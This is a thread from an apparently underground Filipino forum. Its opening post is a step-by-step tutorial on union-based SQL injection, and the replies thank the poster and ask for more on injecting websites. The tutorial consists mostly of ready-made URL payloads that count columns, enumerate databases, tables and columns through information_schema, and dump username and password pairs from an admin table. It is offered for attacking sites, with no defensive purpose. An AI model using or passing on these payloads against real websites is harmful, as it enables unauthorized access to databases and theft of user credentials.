Welcome to Katz - Pinoy Underground Forum

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?
  • Compact Safety Notice
  • Weekly Grants Lottery is live! Win a 20,000 ₪ jackpot — tickets are just 30 ₪, drawn every week. Buy your tickets »

String-Based SQL Injection

N 879

nethanker

Abecedarian
Member
Access
Member
Access
12 Year Veteran 12y Veteran
Joined
Aug 27, 2014
Messages
111
Reaction score
70
Points
28
grants
₲2,769
Here is a tutorial on String Based SQL Injection. This must certainly help many of you guys Awink


What is String Based SQL injection
String Based SQL Injection is used when the target website does not display the result when we enter a query.

Here are some Common Issues and cases when you have to use String Based SQL Injection :
Code:
Order By does not work Example : Order by 10000 does not show error/
Group By statement does not work.
Queries related to SQL injection doesnt work.

The Solution
So the solution for solving when you are having problem is ,just modify your syntax a bit.


Code:
http://site.com/index.php?id=10 order by 1000--+
So we add a at the end of the link and we add a + at the end of the -- .

String - Union Based SQL Injection

Obtaining Columns
Code:
Code:
http://www.site.com/index.php?id=234 order by 13--+

Obtaining the Databases
Code:
Code:
http://www.site.com/index.php?id=-234 UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Obtaining the Tables from the current Database
Code:
Code:
http://www.site.com/index.php?id=-234 UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
.Obtaining Column names from a specific table (which in this example is "admin")
Code:
Code:
http://www.site.com/index.php?id=-234 UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
Obtaining Data from Column names
Code:
Code:
http://www.site.com/index.php?id=-234 UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

credits: Rain112/CHF
 
J 29.5K

jughead3716

Alpha and Omega
Contributor
Ardent
Access
Contributor
Ardent
Access
Top Contributor
Community Legend
12 Year Veteran 12y Veteran
Joined
Jun 28, 2014
Messages
5,196
Reaction score
11,747
Points
113
grants
₲14,656
nakita ko na punkz kung saan mo ito nakukuha.. hehe.. :hehe:

member ka rin ba dito....
maka join na rin para magmasid... :D

gusto ko talaga kasi matuto ng mga ganito eh...

salamat dito... :D
 
A 1.8K

Abs-Gma

Corporal
Ardent
Member
Access
Ardent
Member
Access
Rising Star
12 Year Veteran 12y Veteran
Joined
Jul 22, 2014
Messages
523
Reaction score
307
Points
63
Age
32
grants
₲5,883
post nyo nga dito yun nauna jan fafs ten yun pag inject ng WEBSITE :)

BTW thanks for sharing keepsharing
 
OP
N 879

nethanker

Abecedarian
Member
Access
Member
Access
12 Year Veteran 12y Veteran
Joined
Aug 27, 2014
Messages
111
Reaction score
70
Points
28
grants
₲2,769
ahh, oo. matagal na ako dun punkz.
beep me kung makita mo ako dun. :D

anyway, magandang i share ung mga iba dun dito :)
 
Top Bottom